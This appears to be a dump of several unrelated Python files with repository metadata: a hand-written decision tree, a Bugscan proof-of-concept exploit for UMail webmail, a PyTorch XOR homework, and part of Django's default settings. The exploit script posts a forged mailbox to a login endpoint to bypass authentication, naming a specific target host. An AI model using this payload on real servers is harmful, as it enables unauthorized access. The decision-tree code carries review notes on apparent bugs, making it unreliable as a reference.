                information_gain = self.empirical_entropy - (front_entropy * (len(front) / len(
                    dim_data[0])) + behind_entropy * (len(behind) / len(dim_data[0])))
                information_gain_list.append(information_gain)
        max_information_gain = max(information_gain_list)
        return max_information_gain, div_points[information_gain_list.index(max_information_gain)]
    def compare_features(self):
        """
        Compute the best split per feature and store gains, split values and
        feature indices (sorted by gain) into the class-level lists.
        """
        gain_list_tmp = []
        point_list = []
        for i in range(self.features):
            information_gain, div_point = self.div_point((self.data[1], self.data[0].transpose()[i]))
            gain_list_tmp.append(information_gain)
            point_list.append(div_point)
        # Rows: gains, split values, feature indices; columns sorted by gain.
        com_matrix = np.array([
            gain_list_tmp,
            point_list,
            range(self.features)
        ])
        com_matrix = com_matrix[:, com_matrix[0].argsort()]
        Decision_Tree.feature_list = list(com_matrix[1])
        Decision_Tree.gain_list = list(com_matrix[0])
        Decision_Tree.dim_list = list(com_matrix[2])
    def planet_tree(self, data):
        """
        Recursively grow ("plant") the tree; `data` is a sample array without
        the label column.
        """
        feature = Decision_Tree.feature_list[Decision_Tree.index]
        dim = Decision_Tree.dim_list[Decision_Tree.index]
        Decision_Tree.index += 1
        # Stop when the stored gain is the -1 sentinel or the cursor runs out.
        # FIXME(review): the leaf branch indexes data.transpose()[int(dim)]
        # but the recursive branch slices data[0] - the two branches appear to
        # assume different `data` layouts; confirm the intended structure.
        if Decision_Tree.gain_list[Decision_Tree.feature_list.index(feature)] == -1 or Decision_Tree.index >= len(Decision_Tree.feature_list) - 1:
            return tree_node([x for x in data.transpose()[int(dim)] if x < feature],
                             [x for x in data.transpose()[int(dim)] if x > feature],
                             feature)
        else:
            return tree_node(self.planet_tree([x for x in data[0] if x < feature]),self.planet_tree([x for x in data[0] if x > feature]), feature)
class tree_node(object):
    """A single binary node of the decision tree."""
    def __init__(self, left, right, data):
        # left/right hold child subtrees or leaf payloads; data is the split value.
        self.left = left
        self.right = right
        self.data = data
| 41.219858 | 147 | 0.567275 |
from sklearn.datasets import make_classification
import numpy as np
import math
class Decision_Tree(object):
    """Decision tree built over a synthetic sklearn dataset by maximising
    per-feature information gain."""
    # Class-level state: per-feature split values, their gains, feature order,
    # and a cursor used while growing the tree.
    feature_list = []
    gain_list = []
    dim_list = []
    index = 0
    def __init__(self):
        super(Decision_Tree, self).__init__()
        # 100 samples x 5 continuous features, 2 classes.
        self.features = 5
        self.samples = 100
        self.data = make_classification(
            n_samples=self.samples, n_features=self.features, n_classes=2)
        self.empirical_entropy = self.cal_emp_entropy(self.data)
    def cal_emp_entropy(self, data):
        """Empirical entropy of a (samples, 0/1-labels) pair.

        NOTE(review): raises on log2(0) if either class is empty.
        """
        data_0 = []
        data_1 = []
        for i in enumerate(data[1]):
            if i[1] == 0:
                data_0.append(data[0][i[0]])
            else:
                data_1.append(data[0][i[0]])
        entropy = 0
        for data_ in [data_0, data_1]:
            entropy += - \
                (len(data_) / len(data[0])) * \
                math.log2(len(data_) / len(data[0]))
        return entropy
    def div_point(self, dim_data):
        """Best split point for one feature given (labels, values).

        Returns (best_gain, split_value); a gain of -1 is an early-exit
        sentinel for a homogeneous first half at the exact midpoint.
        """
        def dichotomy(dim_data):
            # Candidate split points: midpoints of consecutive values.
            div_points = np.zeros((1, self.samples)).reshape(self.samples)
            for i in enumerate(dim_data):
                if i[0] == len(dim_data) - 1:
                    break
                div_points[i[0]] = (dim_data[i[0] + 1] + i[1]) / 2
            return div_points
        dim_data = list(dim_data)
        dim_data = np.array(dim_data)
        # NOTE(review): sorts columns by the labels row - confirm whether the
        # values row (dim_data[1]) was intended as the sort key.
        dim_data = dim_data[:, dim_data[0].argsort()]
        dim_data = tuple(dim_data)
        div_points = dichotomy(dim_data[1])
        information_gain_list = []
        for i in div_points:
            div_index = list(div_points).index(i) + 1
            front = dim_data[1][:div_index]
            behind = dim_data[1][div_index:]
            front_flag = dim_data[0][:div_index]
            behind_flag = dim_data[0][div_index:]
            front_data = (front, front_flag)
            behind_data = (behind, behind_flag)
            # "== reversed, all()" tests whether a partition's labels are
            # homogeneous.
            if len(front_data[0]) == 1 or ((front_data[1] == front_data[1][::-1]).all() and len(front_data[0]) != len(dim_data[0]) / 2):
                behind_entropy = self.cal_emp_entropy(behind_data)
                information_gain = self.empirical_entropy - \
                    (behind_entropy * (len(behind) / len(dim_data[0])))
                information_gain_list.append(information_gain)
            elif len(behind_data[0]) == 1 or ((behind_data[1] == behind_data[1][::-1]).all() and len(front_data[0]) != len(dim_data[0]) / 2):
                front_entropy = self.cal_emp_entropy(front_data)
                information_gain = self.empirical_entropy - \
                    (front_entropy * (len(front) / len(dim_data[0])))
                information_gain_list.append(information_gain)
            elif (front_data[1] == front_data[1][::-1]).all() and len(front_data[0]) == len(dim_data[0]) / 2:
                return -1, div_points[int(len(dim_data[0]) / 2 - 1)]
            else:
                front_entropy = self.cal_emp_entropy(front_data)
                behind_entropy = self.cal_emp_entropy(behind_data)
                information_gain = self.empirical_entropy - (front_entropy * (len(front) / len(
                    dim_data[0])) + behind_entropy * (len(behind) / len(dim_data[0])))
                information_gain_list.append(information_gain)
        max_information_gain = max(information_gain_list)
        return max_information_gain, div_points[information_gain_list.index(max_information_gain)]
    def compare_features(self):
        """Rank all features by their best information gain, storing results
        in the class-level lists."""
        gain_list_tmp = []
        point_list = []
        for i in range(self.features):
            information_gain, div_point = self.div_point((self.data[1], self.data[0].transpose()[i]))
            gain_list_tmp.append(information_gain)
            point_list.append(div_point)
        # Rows: gains, split values, feature indices; columns sorted by gain.
        com_matrix = np.array([
            gain_list_tmp,
            point_list,
            range(self.features)
        ])
        com_matrix = com_matrix[:, com_matrix[0].argsort()]
        Decision_Tree.feature_list = list(com_matrix[1])
        Decision_Tree.gain_list = list(com_matrix[0])
        Decision_Tree.dim_list = list(com_matrix[2])
    def planet_tree(self, data):
        """Recursively grow the tree from unlabeled sample data.

        NOTE(review): the leaf branch indexes data.transpose()[int(dim)] while
        the recursive branch slices data[0]; the assumed layouts differ.
        """
        feature = Decision_Tree.feature_list[Decision_Tree.index]
        dim = Decision_Tree.dim_list[Decision_Tree.index]
        Decision_Tree.index += 1
        if Decision_Tree.gain_list[Decision_Tree.feature_list.index(feature)] == -1 or Decision_Tree.index >= len(Decision_Tree.feature_list) - 1:
            return tree_node([x for x in data.transpose()[int(dim)] if x < feature],
                             [x for x in data.transpose()[int(dim)] if x > feature],
                             feature)
        else:
            return tree_node(self.planet_tree([x for x in data[0] if x < feature]),self.planet_tree([x for x in data[0] if x > feature]), feature)
class tree_node(object):
    """A single binary node of the decision tree."""
    def __init__(self, left, right, data):
        # left/right: child subtrees or leaf payloads; data: the split value.
        self.left=left
        self.right=right
        self.data=data
| true | true |
f7326756f8ad7832b4a6f8c87d9131cd0c7553a9 | 721 | py | Python | Bugscan_exploits-master/exp_list/exp-1063.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-1063.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-1063.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/env python
#from:http://www.wooyun.org/bugs/wooyun-2010-093049
import re,time
def assign(service, arg):
    """Claim the target when the detected service is UMail; otherwise pass (None)."""
    if service != "umail":
        return None
    return True, arg
def audit(arg):
    """Probe the UMail fast-login endpoint for the session-forging flaw
    (WooYun-2010-093049): POST an arbitrary mailbox and check for the
    auto-refresh redirect that indicates the forged session was accepted."""
    login_url = arg + '/webmail/fast/index.php?module=operate&action=login'
    payload = 'mailbox=test@domain.com&link=?'
    # curl and security_warning are injected by the scanner runtime.
    status, head, body, errcode, _ = curl.curl2(login_url,post=payload)
    if status == 200 and '<meta http-equiv="refresh" content="0; URL=index.php">' in body:
        security_warning('make a session,access the file which guest not be allowed:post mailbox=test@domain.com&link=? to %s'%login_url)
if __name__ == '__main__':
    # Standalone run: pull the scanner stubs (curl, security_warning, ...)
    # from the dummy harness and audit a known target.
    from dummy import *
    audit(assign('umail', 'http://oa.shindoo.com:810/')[1])
import re,time
def assign(service, arg):
    """Claim the target when the detected service is UMail; implicit None otherwise."""
    if service == "umail":
        return True, arg
def audit(arg):
    """POST a forged mailbox to the UMail fast-login endpoint and flag success."""
    url = arg + '/webmail/fast/index.php?module=operate&action=login'
    postdata = 'mailbox=test@domain.com&link=?'
    # curl and security_warning are injected by the scanner runtime.
    code, head, res, errcode, _ = curl.curl2(url,post=postdata)
    # The auto-refresh meta tag means the forged session was accepted.
    if code == 200 and '<meta http-equiv="refresh" content="0; URL=index.php">' in res:
        security_warning('make a session,access the file which guest not be allowed:post mailbox=test@domain.com&link=? to %s'%url)
if __name__ == '__main__':
    # Standalone run against a known target, using the dummy scanner stubs.
    from dummy import *
    audit(assign('umail', 'http://oa.shindoo.com:810/')[1])
f73267d55ff079ff1596cde36652108c05688ded | 2,752 | py | Python | DNN_HW5/main.py | jun-hyeok/SUP5001-41_Deep-Neural-Networks_2022Spring | 95bc0f3a7042debbc388c76d9bd43ad24aba2c88 | [
"MIT"
] | null | null | null | DNN_HW5/main.py | jun-hyeok/SUP5001-41_Deep-Neural-Networks_2022Spring | 95bc0f3a7042debbc388c76d9bd43ad24aba2c88 | [
"MIT"
] | null | null | null | DNN_HW5/main.py | jun-hyeok/SUP5001-41_Deep-Neural-Networks_2022Spring | 95bc0f3a7042debbc388c76d9bd43ad24aba2c88 | [
"MIT"
] | null | null | null | # %% [markdown]
# [](https://colab.research.google.com/github/jun-hyeok/SUP5001-41_Deep-Neural-Networks_2022Spring/blob/main/DNN_HW5/main.ipynb)
# %% [markdown]
# # DNN HW5 : #9
#
# 2022.03.23
# 박준혁
# %%
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# %% [markdown]
# Create XOR dataset with torch.FloatTensor
# %%
# xor dataset
# Four input pairs and their XOR targets, as float tensors so they can feed
# binary cross-entropy directly.
x = torch.FloatTensor([[0, 0], [0, 1], [1, 0], [1, 1]])
y = torch.FloatTensor([[0], [1], [1], [0]])
# %% [markdown]
# 1. NN model - 10 hidden layer with 4 nodes each
# %%
# neural network 10 hidden layers with 4 nodes each
class NN10(nn.Module):
    """Fully connected net with 10 layers (4 units each hidden) for binary XOR.

    ReLU between hidden layers; sigmoid on the single output unit so the
    result can feed binary cross-entropy directly.
    """
    def __init__(self):
        super().__init__()
        self.fc1 = nn.Linear(2, 4, bias=True)
        self.fc2 = nn.Linear(4, 4)
        self.fc3 = nn.Linear(4, 4)
        self.fc4 = nn.Linear(4, 4)
        self.fc5 = nn.Linear(4, 4)
        self.fc6 = nn.Linear(4, 4)
        self.fc7 = nn.Linear(4, 4)
        self.fc8 = nn.Linear(4, 4)
        self.fc9 = nn.Linear(4, 4)
        self.fc10 = nn.Linear(4, 1)
    def forward(self, x):
        """Map (N, 2) inputs to (N, 1) probabilities in (0, 1)."""
        # Loop over the hidden stack instead of nine copy-pasted lines.
        for hidden in (self.fc1, self.fc2, self.fc3, self.fc4, self.fc5,
                       self.fc6, self.fc7, self.fc8, self.fc9):
            x = F.relu(hidden(x))
        # torch.sigmoid replaces the long-deprecated F.sigmoid.
        return torch.sigmoid(self.fc10(x))
# %%
# Train the 10-layer model on XOR with plain SGD and BCE loss.
nn10 = NN10()
optimizer10 = optim.SGD(nn10.parameters(), lr=0.1)

epochs = 10000
for epoch in range(epochs):
    optimizer10.zero_grad()
    y_pred10 = nn10(x)
    ce10 = F.binary_cross_entropy(y_pred10, y)
    ce10.backward()
    optimizer10.step()
    if epoch % 1000 == 0:
        # Progress report every 1000 epochs (single line, space-separated).
        print(f"Epoch: {epoch:4d}/{epochs}", f"Cost: {ce10.item():.6f}")
# %% [markdown]
# 2. NN model - 2 hidden layer with 4 nodes each
# %%
# neural network 2 hidden layers with 4 nodes each
class NN02(nn.Module):
    """Shallow MLP for XOR: 2 inputs -> two 4-unit ReLU layers -> 1 sigmoid output."""

    def __init__(self):
        super().__init__()
        self.fc1 = nn.Linear(2, 4, bias=True)
        self.fc2 = nn.Linear(4, 4)
        self.fc3 = nn.Linear(4, 1)

    def forward(self, x):
        """Map a (N, 2) batch to (N, 1) probabilities in [0, 1]."""
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        # F.sigmoid is deprecated; torch.sigmoid is the supported spelling.
        return torch.sigmoid(self.fc3(x))
# %%
# Train the 2-layer model on XOR with the same SGD/BCE recipe.
nn02 = NN02()
optimizer02 = optim.SGD(nn02.parameters(), lr=0.1)

epochs = 10000
for epoch in range(epochs):
    optimizer02.zero_grad()
    y_pred02 = nn02(x)
    ce02 = F.binary_cross_entropy(y_pred02, y)
    ce02.backward()
    optimizer02.step()
    if epoch % 1000 == 0:
        # Progress report every 1000 epochs (single line, space-separated).
        print(f"Epoch: {epoch:4d}/{epochs}", f"Cost: {ce02.item():.6f}")
| 26.461538 | 202 | 0.579215 |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# XOR inputs (4 x 2) and labels (4 x 1) as float32 tensors.
x = torch.FloatTensor([[0, 0], [0, 1], [1, 0], [1, 1]])
y = torch.FloatTensor([[0], [1], [1], [0]])
class NN10(nn.Module):
    """Deep MLP for XOR: 2 inputs -> nine 4-unit ReLU layers -> 1 sigmoid output."""

    def __init__(self):
        super().__init__()
        self.fc1 = nn.Linear(2, 4, bias=True)
        self.fc2 = nn.Linear(4, 4)
        self.fc3 = nn.Linear(4, 4)
        self.fc4 = nn.Linear(4, 4)
        self.fc5 = nn.Linear(4, 4)
        self.fc6 = nn.Linear(4, 4)
        self.fc7 = nn.Linear(4, 4)
        self.fc8 = nn.Linear(4, 4)
        self.fc9 = nn.Linear(4, 4)
        self.fc10 = nn.Linear(4, 1)

    def forward(self, x):
        """Map a (N, 2) batch to (N, 1) probabilities in [0, 1]."""
        # Nine ReLU-activated hidden layers, applied in order.
        for layer in (self.fc1, self.fc2, self.fc3, self.fc4, self.fc5,
                      self.fc6, self.fc7, self.fc8, self.fc9):
            x = F.relu(layer(x))
        # F.sigmoid is deprecated; torch.sigmoid is the supported spelling.
        return torch.sigmoid(self.fc10(x))
# Train the 10-layer model on XOR with plain SGD and BCE loss.
nn10 = NN10()
optimizer10 = optim.SGD(nn10.parameters(), lr=0.1)

epochs = 10000
for epoch in range(epochs):
    optimizer10.zero_grad()
    y_pred10 = nn10(x)
    ce10 = F.binary_cross_entropy(y_pred10, y)
    ce10.backward()
    optimizer10.step()
    if epoch % 1000 == 0:
        # Progress report every 1000 epochs (single line, space-separated).
        print(f"Epoch: {epoch:4d}/{epochs}", f"Cost: {ce10.item():.6f}")
class NN02(nn.Module):
    """Shallow MLP for XOR: 2 inputs -> two 4-unit ReLU layers -> 1 sigmoid output."""

    def __init__(self):
        super().__init__()
        self.fc1 = nn.Linear(2, 4, bias=True)
        self.fc2 = nn.Linear(4, 4)
        self.fc3 = nn.Linear(4, 1)

    def forward(self, x):
        """Map a (N, 2) batch to (N, 1) probabilities in [0, 1]."""
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        # F.sigmoid is deprecated; torch.sigmoid is the supported spelling.
        return torch.sigmoid(self.fc3(x))
# Train the 2-layer model on XOR with the same SGD/BCE recipe.
nn02 = NN02()
optimizer02 = optim.SGD(nn02.parameters(), lr=0.1)

epochs = 10000
for epoch in range(epochs):
    optimizer02.zero_grad()
    y_pred02 = nn02(x)
    ce02 = F.binary_cross_entropy(y_pred02, y)
    ce02.backward()
    optimizer02.step()
    if epoch % 1000 == 0:
        # Progress report every 1000 epochs (single line, space-separated).
        print(f"Epoch: {epoch:4d}/{epochs}", f"Cost: {ce02.item():.6f}")
| true | true |
f732682b1cfe1fafeaca346811b06f346f04b564 | 22,189 | py | Python | virtual/lib/python3.6/site-packages/django/conf/global_settings.py | Ruterana/clone_instagram | a068587ef1d1a93ec8d1c08086bf11c0fb274b83 | [
"MIT"
] | 90 | 2017-08-24T18:57:21.000Z | 2022-03-04T01:58:56.000Z | virtual/lib/python3.6/site-packages/django/conf/global_settings.py | Ruterana/clone_instagram | a068587ef1d1a93ec8d1c08086bf11c0fb274b83 | [
"MIT"
] | 27 | 2017-04-01T15:06:36.000Z | 2021-02-08T20:19:58.000Z | virtual/lib/python3.6/site-packages/django/conf/global_settings.py | ngishjonathan/gallery | dd67f28887316d6277927c667f6641d26317b0b8 | [
"MIT"
] | 11 | 2019-02-26T14:30:28.000Z | 2021-12-31T05:04:08.000Z | # -*- coding: utf-8 -*-
"""
Default Django settings. Override these with settings in the module pointed to
by the DJANGO_SETTINGS_MODULE environment variable.
"""
from __future__ import unicode_literals
# This is defined here as a do-nothing function because we can't import
# django.utils.translation -- that module depends on the settings.
def gettext_noop(s):
    """Return *s* unchanged; used to mark strings for later translation
    without importing django.utils.translation (which depends on settings)."""
    return s
####################
# CORE #
####################
DEBUG = False
# Whether the framework should propagate raw exceptions rather than catching
# them. This is useful under some testing situations and should never be used
# on a live site.
DEBUG_PROPAGATE_EXCEPTIONS = False
# Whether to use the "ETag" header. This saves bandwidth but slows down performance.
# Deprecated (RemovedInDjango21Warning) in favor of ConditionalGetMiddleware
# which sets the ETag regardless of this setting.
USE_ETAGS = False
# People who get code error notifications.
# In the format [('Full Name', 'email@example.com'), ('Full Name', 'anotheremail@example.com')]
ADMINS = []
# List of IP addresses, as strings, that:
# * See debug comments, when DEBUG is true
# * Receive x-headers
INTERNAL_IPS = []
# Hosts/domain names that are valid for this site.
# "*" matches anything, ".example.com" matches example.com and all subdomains
ALLOWED_HOSTS = []
# Local time zone for this installation. All choices can be found here:
# https://en.wikipedia.org/wiki/List_of_tz_zones_by_name (although not all
# systems may support all possibilities). When USE_TZ is True, this is
# interpreted as the default user time zone.
TIME_ZONE = 'America/Chicago'
# If you set this to True, Django will use timezone-aware datetimes.
USE_TZ = False
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Languages we provide translations for, out of the box.
LANGUAGES = [
('af', gettext_noop('Afrikaans')),
('ar', gettext_noop('Arabic')),
('ast', gettext_noop('Asturian')),
('az', gettext_noop('Azerbaijani')),
('bg', gettext_noop('Bulgarian')),
('be', gettext_noop('Belarusian')),
('bn', gettext_noop('Bengali')),
('br', gettext_noop('Breton')),
('bs', gettext_noop('Bosnian')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('cy', gettext_noop('Welsh')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('dsb', gettext_noop('Lower Sorbian')),
('el', gettext_noop('Greek')),
('en', gettext_noop('English')),
('en-au', gettext_noop('Australian English')),
('en-gb', gettext_noop('British English')),
('eo', gettext_noop('Esperanto')),
('es', gettext_noop('Spanish')),
('es-ar', gettext_noop('Argentinian Spanish')),
('es-co', gettext_noop('Colombian Spanish')),
('es-mx', gettext_noop('Mexican Spanish')),
('es-ni', gettext_noop('Nicaraguan Spanish')),
('es-ve', gettext_noop('Venezuelan Spanish')),
('et', gettext_noop('Estonian')),
('eu', gettext_noop('Basque')),
('fa', gettext_noop('Persian')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('fy', gettext_noop('Frisian')),
('ga', gettext_noop('Irish')),
('gd', gettext_noop('Scottish Gaelic')),
('gl', gettext_noop('Galician')),
('he', gettext_noop('Hebrew')),
('hi', gettext_noop('Hindi')),
('hr', gettext_noop('Croatian')),
('hsb', gettext_noop('Upper Sorbian')),
('hu', gettext_noop('Hungarian')),
('ia', gettext_noop('Interlingua')),
('id', gettext_noop('Indonesian')),
('io', gettext_noop('Ido')),
('is', gettext_noop('Icelandic')),
('it', gettext_noop('Italian')),
('ja', gettext_noop('Japanese')),
('ka', gettext_noop('Georgian')),
('kk', gettext_noop('Kazakh')),
('km', gettext_noop('Khmer')),
('kn', gettext_noop('Kannada')),
('ko', gettext_noop('Korean')),
('lb', gettext_noop('Luxembourgish')),
('lt', gettext_noop('Lithuanian')),
('lv', gettext_noop('Latvian')),
('mk', gettext_noop('Macedonian')),
('ml', gettext_noop('Malayalam')),
('mn', gettext_noop('Mongolian')),
('mr', gettext_noop('Marathi')),
('my', gettext_noop('Burmese')),
('nb', gettext_noop('Norwegian Bokmål')),
('ne', gettext_noop('Nepali')),
('nl', gettext_noop('Dutch')),
('nn', gettext_noop('Norwegian Nynorsk')),
('os', gettext_noop('Ossetic')),
('pa', gettext_noop('Punjabi')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portuguese')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('sl', gettext_noop('Slovenian')),
('sq', gettext_noop('Albanian')),
('sr', gettext_noop('Serbian')),
('sr-latn', gettext_noop('Serbian Latin')),
('sv', gettext_noop('Swedish')),
('sw', gettext_noop('Swahili')),
('ta', gettext_noop('Tamil')),
('te', gettext_noop('Telugu')),
('th', gettext_noop('Thai')),
('tr', gettext_noop('Turkish')),
('tt', gettext_noop('Tatar')),
('udm', gettext_noop('Udmurt')),
('uk', gettext_noop('Ukrainian')),
('ur', gettext_noop('Urdu')),
('vi', gettext_noop('Vietnamese')),
('zh-hans', gettext_noop('Simplified Chinese')),
('zh-hant', gettext_noop('Traditional Chinese')),
]
# Languages using BiDi (right-to-left) layout
LANGUAGES_BIDI = ["he", "ar", "fa", "ur"]
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
LOCALE_PATHS = []
# Settings for language cookie
LANGUAGE_COOKIE_NAME = 'django_language'
LANGUAGE_COOKIE_AGE = None
LANGUAGE_COOKIE_DOMAIN = None
LANGUAGE_COOKIE_PATH = '/'
# If you set this to True, Django will format dates, numbers and calendars
# according to user current locale.
USE_L10N = False
# Not-necessarily-technical managers of the site. They get broken link
# notifications and other various emails.
MANAGERS = ADMINS
# Default content type and charset to use for all HttpResponse objects, if a
# MIME type isn't manually specified. These are used to construct the
# Content-Type header.
DEFAULT_CONTENT_TYPE = 'text/html'
DEFAULT_CHARSET = 'utf-8'
# Encoding of files read from disk (template and initial SQL files).
FILE_CHARSET = 'utf-8'
# Email address that error messages come from.
SERVER_EMAIL = 'root@localhost'
# Database connection info. If left empty, will default to the dummy backend.
DATABASES = {}
# Classes used to implement DB routing behavior.
DATABASE_ROUTERS = []
# The email backend to use. For possible shortcuts see django.core.mail.
# The default is to use the SMTP backend.
# Third-party backends can be specified by providing a Python path
# to a module that defines an EmailBackend class.
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# Host for sending email.
EMAIL_HOST = 'localhost'
# Port for sending email.
EMAIL_PORT = 25
# Whether to send SMTP 'Date' header in the local time zone or in UTC.
EMAIL_USE_LOCALTIME = False
# Optional SMTP authentication information for EMAIL_HOST.
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = False
EMAIL_USE_SSL = False
EMAIL_SSL_CERTFILE = None
EMAIL_SSL_KEYFILE = None
EMAIL_TIMEOUT = None
# List of strings representing installed apps.
INSTALLED_APPS = []
TEMPLATES = []
# Default form rendering class.
FORM_RENDERER = 'django.forms.renderers.DjangoTemplates'
# Default email address to use for various automated correspondence from
# the site managers.
DEFAULT_FROM_EMAIL = 'webmaster@localhost'
# Subject-line prefix for email messages send with django.core.mail.mail_admins
# or ...mail_managers. Make sure to include the trailing space.
EMAIL_SUBJECT_PREFIX = '[Django] '
# Whether to append trailing slashes to URLs.
APPEND_SLASH = True
# Whether to prepend the "www." subdomain to URLs that don't have it.
PREPEND_WWW = False
# Override the server-derived value of SCRIPT_NAME
FORCE_SCRIPT_NAME = None
# List of compiled regular expression objects representing User-Agent strings
# that are not allowed to visit any page, systemwide. Use this for bad
# robots/crawlers. Here are a few examples:
# import re
# DISALLOWED_USER_AGENTS = [
# re.compile(r'^NaverBot.*'),
# re.compile(r'^EmailSiphon.*'),
# re.compile(r'^SiteSucker.*'),
# re.compile(r'^sohu-search')
# ]
DISALLOWED_USER_AGENTS = []
ABSOLUTE_URL_OVERRIDES = {}
# List of compiled regular expression objects representing URLs that need not
# be reported by BrokenLinkEmailsMiddleware. Here are a few examples:
# import re
# IGNORABLE_404_URLS = [
# re.compile(r'^/apple-touch-icon.*\.png$'),
# re.compile(r'^/favicon.ico$),
# re.compile(r'^/robots.txt$),
# re.compile(r'^/phpmyadmin/),
# re.compile(r'\.(cgi|php|pl)$'),
# ]
IGNORABLE_404_URLS = []
# A secret key for this particular Django installation. Used in secret-key
# hashing algorithms. Set this in your settings, or Django will complain
# loudly.
SECRET_KEY = ''
# Default file storage mechanism that holds media.
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = None
# URL that handles the static files served from STATIC_ROOT.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = None
# List of upload handler classes to be applied in order.
FILE_UPLOAD_HANDLERS = [
'django.core.files.uploadhandler.MemoryFileUploadHandler',
'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
# Maximum size, in bytes, of a request before it will be streamed to the
# file system instead of into memory.
FILE_UPLOAD_MAX_MEMORY_SIZE = 2621440 # i.e. 2.5 MB
# Maximum size in bytes of request data (excluding file uploads) that will be
# read before a SuspiciousOperation (RequestDataTooBig) is raised.
DATA_UPLOAD_MAX_MEMORY_SIZE = 2621440 # i.e. 2.5 MB
# Maximum number of GET/POST parameters that will be read before a
# SuspiciousOperation (TooManyFieldsSent) is raised.
DATA_UPLOAD_MAX_NUMBER_FIELDS = 1000
# Directory in which upload streamed files will be temporarily saved. A value of
# `None` will make Django use the operating system's default temporary directory
# (i.e. "/tmp" on *nix systems).
FILE_UPLOAD_TEMP_DIR = None
# The numeric mode to set newly-uploaded files to. The value should be a mode
# you'd pass directly to os.chmod; see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_PERMISSIONS = None
# The numeric mode to assign to newly-created directories, when uploading files.
# The value should be a mode as you'd pass to os.chmod;
# see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_DIRECTORY_PERMISSIONS = None
# Python module path where user will place custom format definition.
# The directory where this setting is pointing should contain subdirectories
# named as the locales, containing a formats.py file
# (i.e. "myproject.locale" for myproject/locale/en/formats.py etc. use)
FORMAT_MODULE_PATH = None
# Default formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'N j, Y'
# Default formatting for datetime objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATETIME_FORMAT = 'N j, Y, P'
# Default formatting for time objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
TIME_FORMAT = 'P'
# Default formatting for date objects when only the year and month are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
YEAR_MONTH_FORMAT = 'F Y'
# Default formatting for date objects when only the month and day are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
MONTH_DAY_FORMAT = 'F j'
# Default short formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATE_FORMAT = 'm/d/Y'
# Default short formatting for datetime objects.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATETIME_FORMAT = 'm/d/Y P'
# Default formats to be used when parsing dates from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATE_INPUT_FORMATS = [
'%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '10/25/2006', '10/25/06'
'%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'
'%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'
'%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'
'%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'
]
# Default formats to be used when parsing times from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '14:30:59'
'%H:%M:%S.%f', # '14:30:59.000200'
'%H:%M', # '14:30'
]
# Default formats to be used when parsing dates and times from input boxes,
# in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%m/%d/%Y %H:%M:%S', # '10/25/2006 14:30:59'
'%m/%d/%Y %H:%M:%S.%f', # '10/25/2006 14:30:59.000200'
'%m/%d/%Y %H:%M', # '10/25/2006 14:30'
